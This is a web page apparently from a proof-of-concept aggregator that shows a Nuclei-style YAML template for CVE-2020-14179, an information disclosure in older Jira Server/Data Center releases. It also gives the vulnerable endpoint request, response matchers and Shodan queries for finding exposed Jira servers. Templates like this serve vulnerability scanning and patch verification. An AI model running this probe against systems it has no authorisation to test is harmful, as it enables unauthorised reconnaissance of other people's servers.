CVE-2020-14179: Atlassian Jira Server/Data Center <8.5.8/8.6.0 - 8.11.1 - Information Disclosure

2025-08-01 Atlassian Jira Server Data Center PoC Public

Description

Atlassian Jira Server and Data Center before 8.5.8 and 8.6.0 through 8.11.1 are susceptible to information disclosure via the /secure/QueryComponent!Default.jspa endpoint. An attacker can view custom field names and custom SLA names.

PoC

id: CVE-2020-14179

info:
  name: Atlassian Jira Server/Data Center <8.5.8/8.6.0 - 8.11.1 - Information Disclosure
  author: x1m_martijn
  severity: medium
  description: Atlassian Jira Server and Data Center before 8.5.8 and 8.6.0 through 8.11.1 are susceptible to information disclosure via the /secure/QueryComponent!Default.jspa endpoint. An attacker can view custom field names and custom SLA names.
  impact: |
    An attacker can exploit this vulnerability to gain access to sensitive information, potentially leading to further attacks.
  remediation: |
    Upgrade Atlassian Jira Server/Data Center to a version higher than 8.11.1 to mitigate the vulnerability.
  reference:
    - https://jira.atlassian.com/browse/JRASERVER-71536
    - https://nvd.nist.gov/vuln/detail/CVE-2020-14179
    - https://github.com/developer3000S/PoC-in-GitHub
    - https://github.com/hackerhackrat/R-poc
    - https://github.com/soosmile/POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2020-14179
    epss-score: 0.76042
    epss-percentile: 0.99504
    cpe: cpe:2.3:a:atlassian:jira_data_center:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: atlassian
    product: jira_data_center
    shodan-query:
      - http.component:"Atlassian Jira"
      - http.component:"atlassian jira"
  tags: cve,cve2020,atlassian,jira,exposure,disclosure,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/secure/QueryComponent!Default.jspa"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '{"searchers":'
          - '"groups":'
          - '"id":"customfield'
        condition: and

      - type: status
        status:
          - 200
# digest: 490a004630440220248e551c0c6cb10676b020c7ff6ce0d1156e47dc1a8f5bef5b74f2dab3202ba2022033e254841da8e1a764db4120c5bde53565362fc72a60c4c4a4030572ea2f36b7:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities